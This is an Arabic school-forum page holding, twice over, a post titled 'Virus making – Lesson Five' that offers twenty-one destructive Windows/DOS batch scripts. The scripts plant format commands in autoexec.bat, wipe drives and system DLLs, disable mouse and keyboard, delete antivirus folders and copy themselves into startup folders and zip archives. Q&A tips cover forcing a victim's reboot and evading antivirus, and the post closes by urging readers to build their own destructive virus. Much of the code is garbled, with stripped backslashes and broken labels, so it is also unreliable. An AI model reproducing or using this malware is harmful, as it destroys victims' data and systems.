بحـث
المواضيع الأخيرة
المواضيع الأكثر نشاطاً
المواضيع الأكثر شعبية
أفضل 10 أعضاء في هذا المنتدى
ahm@@@@d | ||||
ميمو | ||||
ساهر الليل | ||||
SAMORAS | ||||
gorgkl | ||||
أسير الدمع | ||||
محمد أحمد خضور | ||||
samoo | ||||
freedom | ||||
المدير العام للمنتدى |
أفضل 10 فاتحي مواضيع
ahm@@@@d | ||||
محمد أحمد خضور | ||||
freedom | ||||
يعرب بيك | ||||
SAMORAS | ||||
gorgkl | ||||
ميمو | ||||
بسمة ألم | ||||
عمار ابراهيم | ||||
اسكندر |
سحابة الكلمات الدلالية
احصائيات
هذا المنتدى يتوفر على 972 عُضو.آخر عُضو مُسجل هو خالد عبيدات فمرحباً به.
أعضاؤنا قدموا 7411 مساهمة في هذا المنتدى في 2291 موضوع
رجاء التزموا بغاية المنتدى
الأربعاء مارس 16, 2011 1:55 am من طرف نائب المدير العام
رجاء إلى جميع من يزور منتدانا العلمي ...أن يلتزم بالمواضيع العلمية والمختلفة وفقا للبوابات المتاحة
والابتعاد عن المقالات والاخبار الدينية والسياسية فكل منا لديه ما يكفي من الفضائيات والكتب والمبادئ.
وكما ذكر سابقا …
والابتعاد عن المقالات والاخبار الدينية والسياسية فكل منا لديه ما يكفي من الفضائيات والكتب والمبادئ.
وكما ذكر سابقا …
تعاليق: 0
شكر وترحيب
الإثنين سبتمبر 20, 2010 6:22 pm من طرف نائب المدير العام
باسمي وباسم كل الأعضاء في منتدى ثانوية الفارابي أرحب بالمدرسين الأكارم الذين شرفونا بالانضمام إلى هذا المنتدى .
َعلّ هذه الخطوة تحقق غاية من غايات المنتدى في تعزيز عملية التواصل بين المدرس وتلميذه وتطوير آلية التعليم .
…
َعلّ هذه الخطوة تحقق غاية من غايات المنتدى في تعزيز عملية التواصل بين المدرس وتلميذه وتطوير آلية التعليم .
…
تعاليق: 0
إلى جميع الأعضاء
السبت يونيو 19, 2010 9:43 pm من طرف نائب المدير العام
أريد أن أشكر جميع الأعضاء والزوار والمشرفين على جميع مساهماتهم التي أغنت المنتدى وساعدت على تطويره .
وأشكركم أيضا على التزامكم قواعد الأدب والاحترام واللباقة ضمن المنتدى .
أتمنى أن تستمروا بالتواصل معنا
نائب المدير العام
وأشكركم أيضا على التزامكم قواعد الأدب والاحترام واللباقة ضمن المنتدى .
أتمنى أن تستمروا بالتواصل معنا
نائب المدير العام
تعاليق: 0
المتواجدون الآن ؟
ككل هناك 70 عُضو متصل حالياً :: 0 عضو مُسجل, 0 عُضو مُختفي و 70 زائر لا أحد
أكبر عدد للأعضاء المتواجدين في هذا المنتدى في نفس الوقت كان 81 بتاريخ الثلاثاء أكتوبر 01, 2024 5:32 am
صناعة الفيروسات - الدرس الخامس
صفحة 1 من اصل 1
صناعة الفيروسات - الدرس الخامس
الدرس الخامس
الدرس هاد شرح عبارة عن اسئلة واجابة
1-اسئلة و حلول :
س1.كيف نستطيع عمل إعادة تشغيل عند الضغط على الفيروس
------------------------------------
عندما ضغط على الفيرس انتقلت اوامر الدوس الى ملف الاوتوا**ك فلابد من اعادة التشغيل حتى يطلب الوندوز هذا الملف فيجده وهو على الدوس فاينفذ الامر معتقداً انه يحمل
اوامر البدء ...
اضف هذا الكود لعمل ريستارت :
كود PHP:
c:windowsrundll.exe user.exe,exitwindowsexec
ألان عندما يضغط الضحية علية سوف يحدث وينتقل الاوامر الدوسية ومعها سطر الريستارت وهايحدث ريستارت
ويتم تنفيظ الاوامر الدوسيةفي سرعة كبيرة جدا اي أننا اجبرنا الضحية على عمل ريستارت لكى يشتغل الفيرس
س2.هل هناك اكواد اخرى مثل عمل اغلاق للوندوز
------------------------------------
كود PHP:
c:windowsrundll32.exe user.exe,exitwindows
هذا كود لإغلاق
س3.عندما اريد من الفيروس عدم حذف نفسه لماذا اكتب رموز (الدرس الثاني)
------------------------------------
لانه و قد ذكرت في الدرس السابق انه نظام التشغيل النوافذ (Windows)لا يقبل كتابة رموز في اسماء البرامج لاكن نظام التشغيل (MS-DOS)يوافق على كتابة هذه الاسماء .
س4.لماذا اقوم بتغير امتداد الفيروس من BAT الى EXE (الدرس الاول)
------------------------------------
لأنه يمكن لأي شخص كشف الكود البرمجي للفيروس !! و هذا أكبر خطاً مما يؤدي الى استخادمه ضدك فيجب عليك الحذر ..
س5.لماذا اشفر الفيروس و لماذا لا تنص بكتابة كود تدمير المضدات (الدرس الثالث)
------------------------------------
لأنه إذ قمت بكتابة الكود البرمجي الخاص بحذف او ايقاف عمل المضادات سوف يقوم المضاد بتنبيه الضحية و حذف الفيروس مباشرة مما يؤدي الى فشل العملية ...
س6.انت الان تعلمتت صناعة الفيروسات عن طريق الملفات الدفاعية اذن هل يوجد مستوى أقوى
------------------------------------
نعم,يوجد مستويات اقوى مثل الفيجول بيسك[vb]و السي بلس بلس [++C] و لغة التجميع لاكن من مميزات الملفات الدفاعية انه يمكن كتابة اي فيروس في اي حاسبة بدون برنامج معين او مترجم لغة فقط المفكرة ..
2-وهذه بعض أكواد الفيروسات من صنعي:
1.فيروس عمل فورمات C,D,E,F والطابعة واعادة تشغيل الجهاز :
كود PHP:
call attrib -h -r c:autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:autoexec.bat
echo format d: /q /u /autotest >nul >>c:autoexec.bat
echo format e: /q /u /autotest >nul >>c:autoexec.bat
echo format f: /q /u /autotest >nul >>c:autoexec.bat
c:windowsrundll.exe user.exe,exitwindowsexec
------------------------------------
2.فيروس عمل فورمات C,D,E,F والطابعلا :
كود PHP:
call attrib -h -r c:autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:autoexec.bat
echo format d: /q /u /autotest >nul >>c:autoexec.bat
echo format e: /q /u /autotest >nul >>c:autoexec.bat
echo format f: /q /u /autotest >nul >>c:autoexec.bat
------------------------------------
3.فيروس يحذف برنامج المفكرة وينسخ بدل عنه برنامج اخر :
كود PHP:
del C:WINDOWSNOTEPAD.EXE
copy %0 C:WINDOWSNOTPAD.EXE
------------------------------------
4.فايروس افتراضي :
كود PHP:
@echo off
cls
:start
if exist c:AUTOEXEC.bat goto delc
if exist d:AUTOEXEC.bat goto deld
if exist e:AUTOEXEC.bat goto dele
if exist f:AUTOEXEC.bat goto delf
elc
del c:
goto end
eld
del d:
goto end
ele
del e:
goto end
elf
del f:
goto end
end
------------------------------------
5.فايروس النظام :
كود PHP:
@echo off
cls
:start
if exist c:windows goto next
if not exist c:windows goto copy
:next
del c:windows
goto end
:copy
cd c:
md virus
goto end
end
------------------------------------
6.فايروس الدوس :
كود PHP:
@echo off
C:WINDOWSrundll.exe mouse,disable
C:WINDOWSrundll.exe keyboard,disable
del c:command.com
del c:Io.sys
del c:Config.sys
del c:Msdos.sys
del c:windowssystem32command.com
deltree /y C:WINDOWSCOMMAND*.*
deltree /y C:WIN98COMMAND*.*
deltree /y C:WINmeCOMMAND*.*
deltree /y C:WIN_meCOMMAND*.*
deltree /y C:WINxpCOMMAND*.*
deltree /y C:WIN_xpCOMMAND*.*
del d:command.com
del d:Io.sys
del d:Config.sys
del d:Msdos.sys
del d:windowssystem32command.com
deltree
------------------------------------
7.فيروس قاتل ملفات السستم :
كود PHP:
@echo off
c:
cd C:WINDOWSSystem
deltree /y *.dll
cd
deltree /y *.sys
c:
cd C:WINDOWSSystem32
deltree /y *.dll
cd
deltree /y *.sys
d:
cd C:WINDOWSSystem
deltree /y *.dll
cd
deltree /y *.sys
d:
cd C:WINDOWSSystem32
deltree /y *.dll
cd
deltree /y *.sys
CLS
------------------------------------
8.فيروس قاتل الفأرة و لوحة المفاتيح :
كود PHP:
@echo off
C:WINDOWSrundll.exe mouse,disable
C:WINDOWSrundll.exe keyboard,disable
copy key.BAT C:WINDOWSstartm~1programsstartup
copy key.BAT C:Docume~1ALLUSE~1StartM~1ProgramsStartup
copy key.BAT D:Docume~1ALLUSE~1StartM~1ProgramsStartup
CLS
------------------------------------
9.فيروس يمنع استخدام خصائص الشاشة :
كود PHP:
@echo off
cd
cd
deltree /y c:/windows/RUNDLL32.exe
cd
cd
------------------------------------
10.فيروس تدمير سطح المكتب :
كود PHP:
@echo off
cd
cd
deltree /y c:/windows/desktop
cd
cd
------------------------------------
11.فيروس قاتل النورتن :
كود PHP:
@echo off
%WinDir%rundll.exe mouse,disable
%WinDir%rundll.exe keyboard,disable
copy hahahah.BAT %windir%startm~1programsstartup
copy hahahah.BAT C:Docume~1ALLUSE~1StartM~1ProgramsStartup
copy hahahah.BAT D:Docume~1ALLUSE~1StartM~1ProgramsStartup
deltree /y c:progra~1norton~1*.*
deltree /y d:progra~1norton~1*.*
deltree /y c:progra~1zonela~1*.*
deltree /y d:progra~1zonela~1*.*
cls
------------------------------------
12.فيروس التدمير :
كود PHP:
echo off@
c:windowsrundll.exe mouse,disable
c:windowsrundll.exe keyboard,diable
goto del
el
deltree y c:*.*
goto copy
:copy
copy %0 C:WINDOWSStart MenuProgramsStartUpname of virus.bat
cls
puse
------------------------------------
13.فيروس يمحي جميع الملفات التي على الهارد :
كود PHP:
@echo off
c:
cd
deltree /y *.*
d:
cd
deltree /y *.*
------------------------------------
14.فيروس خاص :
كود PHP:
echo off@
del system.ini
del win.ini
del auto exec.bat
del config.sys
------------------------------------
15.اهم فايروس فايروس مدمر :
كود PHP:
echo off@
cls
call attrib -h -r c:autoexec.bat >nul
echo @echo off >c:autoexec.bat
echo deltree /y c:progra~1*.* >nul >>c:autoexec.bat
echo copy c:windowscommandformat.com c: >nul >>c:autoexec.bat
echo copy c:windowscommanddeltree.exe c: >nul >>c:autoexec.bat
echo deltree /y c:windows*.* >nul >>c:autoexec.bat
echo format c: /q /u /autotest >nul >>c:autoexec.bat
------------------------------------
16.فيروس عمل فورمات للجهاز فورا :
كود PHP:
echo off@
cls
call attrib -h -r c:autoexec.bat >nul
echo @echo off >c:autoexec.bat
echo deltree /y c:progra~1*.* >nul >>c:autoexec.bat
echo copy c:windowscommandformat.com c: >nul >>c:autoexec.bat
echo copy c:windowscommanddeltree.exe c: >nul >>c:autoexec.bat
echo deltree /y c:windows*.* >nul >>c:autoexec.bat
echo format c: /q /u /autotest >nul >>c:autoexec.bat
------------------------------------
17.فيروس قتل الوندوز وحذف كل الملفات بعد اول اعادة تشغيل للجهاز :
كود PHP:
call attrib -h -r c:autoexec.bat >nul
@Echo off
c:
cd %WinDir%System
deltree /y *.dll
cd
deltree /y *.sys
------------------------------------
18.فيروس قتل الوندوز وحذف كل الملفات بعد التشغيل مباشرة
كود PHP:
@Echo off
c:
cd %WinDir%System
deltree /y *.dll
cd
deltree /y *.sys
------------------------------------
19.فيروس عمل فورمات C,D,E,F والطابعة وقفل الجهاز :
كود PHP:
call attrib -h -r c:autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:autoexec.bat
echo format d: /q /u /autotest >nul >>c:autoexec.bat
echo format e: /q /u /autotest >nul >>c:autoexec.bat
echo format f: /q /u /autotest >nul >>c:autoexec.bat
c:windowsrundll32.exe user.exe,exitwindows
------------------------------------
20.فيروس النسخ الالي :
كود PHP:
@echo off
:start
cls
copy %0 c:/virusautocopy.bat
copy %0 c:/windows/virusautocopy.bat
copy %0 d:/virusautocopy.bat
copy %0 c:/My Documents/virusautocopy.bat
end
------------------------------------
21.فايروس ينسخ نفسه في network و ملفات winzip و start up ( اهم فيروس – ) :
كود PHP:
send msg to any one onlin in the network and start many programs
del all c files and copy it self in any dirve
if exist d:
copy %0 d:game.bat
copy %0 d:autoexec.bat
@echo off
echo Virus Name:A7meedye
c:windowsrundll.exe mouse,disable
c:windowsrundll.exe keyboard,disable
goto network
:network
cls
if exist c:winnt goto winnt
copy %0 c:windowsalluse~1applic~1Network89.bat
copy %0 c:windowsalluse~1destkopNetwork89.bat
copy %0 c:windowsalluse~1startm~1Network89.bat
copy %0 c:windowsalluse~1startm~1progra~1Network89.ba t
goto zip
zip:
cls
@dir /s /b /l c:winzip32.exe | set wz=
@FOR /F "delims==" %%y IN ('dir /s /b /l c:\*.zip') DO @echo "%wz%" -min -a -r -p "%%y"
goto startup
startup:
cls
copy %0 C:WINDOWSStart MenuProgramsStartUpNetwork89.bat
goto del
و الأن ابتكر فيروسك المدمر بكل بساطة
مع تحيات أخوكم :bl@ck h@cker
الدرس هاد شرح عبارة عن اسئلة واجابة
1-اسئلة و حلول :
س1.كيف نستطيع عمل إعادة تشغيل عند الضغط على الفيروس
------------------------------------
عندما ضغط على الفيرس انتقلت اوامر الدوس الى ملف الاوتوا**ك فلابد من اعادة التشغيل حتى يطلب الوندوز هذا الملف فيجده وهو على الدوس فاينفذ الامر معتقداً انه يحمل
اوامر البدء ...
اضف هذا الكود لعمل ريستارت :
كود PHP:
c:windowsrundll.exe user.exe,exitwindowsexec
ألان عندما يضغط الضحية علية سوف يحدث وينتقل الاوامر الدوسية ومعها سطر الريستارت وهايحدث ريستارت
ويتم تنفيظ الاوامر الدوسيةفي سرعة كبيرة جدا اي أننا اجبرنا الضحية على عمل ريستارت لكى يشتغل الفيرس
س2.هل هناك اكواد اخرى مثل عمل اغلاق للوندوز
------------------------------------
كود PHP:
c:windowsrundll32.exe user.exe,exitwindows
هذا كود لإغلاق
س3.عندما اريد من الفيروس عدم حذف نفسه لماذا اكتب رموز (الدرس الثاني)
------------------------------------
لانه و قد ذكرت في الدرس السابق انه نظام التشغيل النوافذ (Windows)لا يقبل كتابة رموز في اسماء البرامج لاكن نظام التشغيل (MS-DOS)يوافق على كتابة هذه الاسماء .
س4.لماذا اقوم بتغير امتداد الفيروس من BAT الى EXE (الدرس الاول)
------------------------------------
لأنه يمكن لأي شخص كشف الكود البرمجي للفيروس !! و هذا أكبر خطاً مما يؤدي الى استخادمه ضدك فيجب عليك الحذر ..
س5.لماذا اشفر الفيروس و لماذا لا تنص بكتابة كود تدمير المضدات (الدرس الثالث)
------------------------------------
لأنه إذ قمت بكتابة الكود البرمجي الخاص بحذف او ايقاف عمل المضادات سوف يقوم المضاد بتنبيه الضحية و حذف الفيروس مباشرة مما يؤدي الى فشل العملية ...
س6.انت الان تعلمتت صناعة الفيروسات عن طريق الملفات الدفاعية اذن هل يوجد مستوى أقوى
------------------------------------
نعم,يوجد مستويات اقوى مثل الفيجول بيسك[vb]و السي بلس بلس [++C] و لغة التجميع لاكن من مميزات الملفات الدفاعية انه يمكن كتابة اي فيروس في اي حاسبة بدون برنامج معين او مترجم لغة فقط المفكرة ..
2-وهذه بعض أكواد الفيروسات من صنعي:
1.فيروس عمل فورمات C,D,E,F والطابعة واعادة تشغيل الجهاز :
كود PHP:
call attrib -h -r c:autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:autoexec.bat
echo format d: /q /u /autotest >nul >>c:autoexec.bat
echo format e: /q /u /autotest >nul >>c:autoexec.bat
echo format f: /q /u /autotest >nul >>c:autoexec.bat
c:windowsrundll.exe user.exe,exitwindowsexec
------------------------------------
2.فيروس عمل فورمات C,D,E,F والطابعلا :
كود PHP:
call attrib -h -r c:autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:autoexec.bat
echo format d: /q /u /autotest >nul >>c:autoexec.bat
echo format e: /q /u /autotest >nul >>c:autoexec.bat
echo format f: /q /u /autotest >nul >>c:autoexec.bat
------------------------------------
3.فيروس يحذف برنامج المفكرة وينسخ بدل عنه برنامج اخر :
كود PHP:
del C:WINDOWSNOTEPAD.EXE
copy %0 C:WINDOWSNOTPAD.EXE
------------------------------------
4.فايروس افتراضي :
كود PHP:
@echo off
cls
:start
if exist c:AUTOEXEC.bat goto delc
if exist d:AUTOEXEC.bat goto deld
if exist e:AUTOEXEC.bat goto dele
if exist f:AUTOEXEC.bat goto delf
elc
del c:
goto end
eld
del d:
goto end
ele
del e:
goto end
elf
del f:
goto end
end
------------------------------------
5.فايروس النظام :
كود PHP:
@echo off
cls
:start
if exist c:windows goto next
if not exist c:windows goto copy
:next
del c:windows
goto end
:copy
cd c:
md virus
goto end
end
------------------------------------
6.فايروس الدوس :
كود PHP:
@echo off
C:WINDOWSrundll.exe mouse,disable
C:WINDOWSrundll.exe keyboard,disable
del c:command.com
del c:Io.sys
del c:Config.sys
del c:Msdos.sys
del c:windowssystem32command.com
deltree /y C:WINDOWSCOMMAND*.*
deltree /y C:WIN98COMMAND*.*
deltree /y C:WINmeCOMMAND*.*
deltree /y C:WIN_meCOMMAND*.*
deltree /y C:WINxpCOMMAND*.*
deltree /y C:WIN_xpCOMMAND*.*
del d:command.com
del d:Io.sys
del d:Config.sys
del d:Msdos.sys
del d:windowssystem32command.com
deltree
------------------------------------
7.فيروس قاتل ملفات السستم :
كود PHP:
@echo off
c:
cd C:WINDOWSSystem
deltree /y *.dll
cd
deltree /y *.sys
c:
cd C:WINDOWSSystem32
deltree /y *.dll
cd
deltree /y *.sys
d:
cd C:WINDOWSSystem
deltree /y *.dll
cd
deltree /y *.sys
d:
cd C:WINDOWSSystem32
deltree /y *.dll
cd
deltree /y *.sys
CLS
------------------------------------
8.فيروس قاتل الفأرة و لوحة المفاتيح :
كود PHP:
@echo off
C:WINDOWSrundll.exe mouse,disable
C:WINDOWSrundll.exe keyboard,disable
copy key.BAT C:WINDOWSstartm~1programsstartup
copy key.BAT C:Docume~1ALLUSE~1StartM~1ProgramsStartup
copy key.BAT D:Docume~1ALLUSE~1StartM~1ProgramsStartup
CLS
------------------------------------
9.فيروس يمنع استخدام خصائص الشاشة :
كود PHP:
@echo off
cd
cd
deltree /y c:/windows/RUNDLL32.exe
cd
cd
------------------------------------
10.فيروس تدمير سطح المكتب :
كود PHP:
@echo off
cd
cd
deltree /y c:/windows/desktop
cd
cd
------------------------------------
11.فيروس قاتل النورتن :
كود PHP:
@echo off
%WinDir%rundll.exe mouse,disable
%WinDir%rundll.exe keyboard,disable
copy hahahah.BAT %windir%startm~1programsstartup
copy hahahah.BAT C:Docume~1ALLUSE~1StartM~1ProgramsStartup
copy hahahah.BAT D:Docume~1ALLUSE~1StartM~1ProgramsStartup
deltree /y c:progra~1norton~1*.*
deltree /y d:progra~1norton~1*.*
deltree /y c:progra~1zonela~1*.*
deltree /y d:progra~1zonela~1*.*
cls
------------------------------------
12.فيروس التدمير :
كود PHP:
echo off@
c:windowsrundll.exe mouse,disable
c:windowsrundll.exe keyboard,diable
goto del
el
deltree y c:*.*
goto copy
:copy
copy %0 C:WINDOWSStart MenuProgramsStartUpname of virus.bat
cls
puse
------------------------------------
13.فيروس يمحي جميع الملفات التي على الهارد :
كود PHP:
@echo off
c:
cd
deltree /y *.*
d:
cd
deltree /y *.*
------------------------------------
14.فيروس خاص :
كود PHP:
echo off@
del system.ini
del win.ini
del auto exec.bat
del config.sys
------------------------------------
15.اهم فايروس فايروس مدمر :
كود PHP:
echo off@
cls
call attrib -h -r c:autoexec.bat >nul
echo @echo off >c:autoexec.bat
echo deltree /y c:progra~1*.* >nul >>c:autoexec.bat
echo copy c:windowscommandformat.com c: >nul >>c:autoexec.bat
echo copy c:windowscommanddeltree.exe c: >nul >>c:autoexec.bat
echo deltree /y c:windows*.* >nul >>c:autoexec.bat
echo format c: /q /u /autotest >nul >>c:autoexec.bat
------------------------------------
16.فيروس عمل فورمات للجهاز فورا :
كود PHP:
echo off@
cls
call attrib -h -r c:autoexec.bat >nul
echo @echo off >c:autoexec.bat
echo deltree /y c:progra~1*.* >nul >>c:autoexec.bat
echo copy c:windowscommandformat.com c: >nul >>c:autoexec.bat
echo copy c:windowscommanddeltree.exe c: >nul >>c:autoexec.bat
echo deltree /y c:windows*.* >nul >>c:autoexec.bat
echo format c: /q /u /autotest >nul >>c:autoexec.bat
------------------------------------
17.فيروس قتل الوندوز وحذف كل الملفات بعد اول اعادة تشغيل للجهاز :
كود PHP:
call attrib -h -r c:autoexec.bat >nul
@Echo off
c:
cd %WinDir%System
deltree /y *.dll
cd
deltree /y *.sys
------------------------------------
18.فيروس قتل الوندوز وحذف كل الملفات بعد التشغيل مباشرة
كود PHP:
@Echo off
c:
cd %WinDir%System
deltree /y *.dll
cd
deltree /y *.sys
------------------------------------
19.فيروس عمل فورمات C,D,E,F والطابعة وقفل الجهاز :
كود PHP:
call attrib -h -r c:autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:autoexec.bat
echo format d: /q /u /autotest >nul >>c:autoexec.bat
echo format e: /q /u /autotest >nul >>c:autoexec.bat
echo format f: /q /u /autotest >nul >>c:autoexec.bat
c:windowsrundll32.exe user.exe,exitwindows
------------------------------------
20.فيروس النسخ الالي :
كود PHP:
@echo off
:start
cls
copy %0 c:/virusautocopy.bat
copy %0 c:/windows/virusautocopy.bat
copy %0 d:/virusautocopy.bat
copy %0 c:/My Documents/virusautocopy.bat
end
------------------------------------
21.فايروس ينسخ نفسه في network و ملفات winzip و start up ( اهم فيروس – ) :
كود PHP:
send msg to any one onlin in the network and start many programs
del all c files and copy it self in any dirve
if exist d:
copy %0 d:game.bat
copy %0 d:autoexec.bat
@echo off
echo Virus Name:A7meedye
c:windowsrundll.exe mouse,disable
c:windowsrundll.exe keyboard,disable
goto network
:network
cls
if exist c:winnt goto winnt
copy %0 c:windowsalluse~1applic~1Network89.bat
copy %0 c:windowsalluse~1destkopNetwork89.bat
copy %0 c:windowsalluse~1startm~1Network89.bat
copy %0 c:windowsalluse~1startm~1progra~1Network89.ba t
goto zip
zip:
cls
@dir /s /b /l c:winzip32.exe | set wz=
@FOR /F "delims==" %%y IN ('dir /s /b /l c:\*.zip') DO @echo "%wz%" -min -a -r -p "%%y"
goto startup
startup:
cls
copy %0 C:WINDOWSStart MenuProgramsStartUpNetwork89.bat
goto del
و الأن ابتكر فيروسك المدمر بكل بساطة
مع تحيات أخوكم :bl@ck h@cker
مواضيع مماثلة
» صناعة الفيروسات - الدرس الرابع
» صناعة الفيروسات - الدرس الثاني
» صناعة الفيروسات - الدرس الأول
» صناعة الفيروسات - الدرس الثالث
» صناعة الفيروسات - الدرس السادس والأخير
» صناعة الفيروسات - الدرس الثاني
» صناعة الفيروسات - الدرس الأول
» صناعة الفيروسات - الدرس الثالث
» صناعة الفيروسات - الدرس السادس والأخير
صفحة 1 من اصل 1
صلاحيات هذا المنتدى:
لاتستطيع الرد على المواضيع في هذا المنتدى
الجمعة أكتوبر 04, 2013 5:47 pm من طرف الأستاذ علي حسن المحمد
» فلاشات حول "ميكانيك السوائل"
الثلاثاء نوفمبر 06, 2012 4:21 pm من طرف عمار ابراهيم
» خاص بنظرية الطاقة الحركية
الأحد نوفمبر 04, 2012 4:22 am من طرف المدير العام للمنتدى
» خاص بميكانيك السوائل والحقل المغناطيسي
الإثنين أكتوبر 29, 2012 7:12 pm من طرف الأستاذ جمال ديب
» خاص بنواس الفتل
الجمعة أكتوبر 19, 2012 2:09 am من طرف الأستاذ جمال ديب
» كلمات أغنية حماك الله ياوطني مع التحميل
الثلاثاء أكتوبر 16, 2012 9:39 pm من طرف hani3571
» خاص بالنواس المرن
السبت أكتوبر 13, 2012 3:42 am من طرف الأستاذ جمال ديب
» خاص بنظرية التسارع الزاوي ونظرية العزوم
الجمعة أكتوبر 12, 2012 5:49 pm من طرف الأستاذ جمال ديب
» الأستاذ محمد نزار الهزاز في ذمة الله
الخميس أكتوبر 11, 2012 12:54 am من طرف المدير العام للمنتدى